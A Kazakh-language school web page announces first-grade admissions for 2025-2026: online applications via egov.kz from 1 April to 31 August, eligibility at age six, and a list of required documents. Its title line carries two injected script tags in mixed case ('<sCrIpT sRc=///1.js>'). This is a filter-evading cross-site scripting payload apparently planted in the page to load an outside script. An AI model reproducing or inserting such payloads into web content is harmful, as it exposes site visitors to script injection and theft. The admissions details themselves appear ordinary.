2025-2026 оқу жылына 1-сыныпқа құжаттарды қабылдау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.03.2025

Құрметті ата-аналар мен заңды өкілдер!

📌2025-2026 оқу жылына 1-сыныпқа құжаттарды қабылдау 2025 жылдың 1 сәуір мен 31 тамыз аралығында электрондық форматта қабылдау жұмысы www.egov.kz порталы арқылы өтеді. 
Өтініш беру туралы бейненұсқаулық www.egov.kz порталында көрсетілген. Қызмет тегін көрсетіледі.

📌 Қазақстан Республикасының заңнамасына сәйкес, 1-сыныпқа биыл 6 жасқа толған немесе осы жылы
 6 жасқа толатын балалар қабылданады.

📌 Қажетті құжаттар:

1️⃣ Баланың туу туралы куәлігінің көшірмесі.
2️⃣ №065/у нысаны бойынша медициналық анықтама.
3️⃣ №026/у-3 нысаны бойынша баланың денсаулық паспорты.
4️⃣ 3х4 см өлшеміндегі 2 дана түрлі-түсті фотосурет.
5️⃣ Баланың ерекше білім беру қажеттіліктері болған жағдайда, психологиялық-медициналық-педагогикалық консультация (ПМПК) қорытындысы.


📌 Өтініштерді қабылдау мерзімі:

📅 1 сәуір – 31 тамыз 2025 жыл.
⚠️ Құжаттарды соңғы уақытқа қалдырмай, алдын ала тапсыру ұсынылады. 

📌 Қосымша ақпарат алу үшін:
Өз қалаңыздың немесе ауданыңыздың білім бөлімдеріне, ресми сайттарына және әлеуметтік желілердегі парақшаларына жүгінуге болады.

📌 Өтініштерді 1 сәуірден бастап қабылдаймыз!

Просмотров: 684


Пікір қосу



Деректерді қолтаңбаға қосу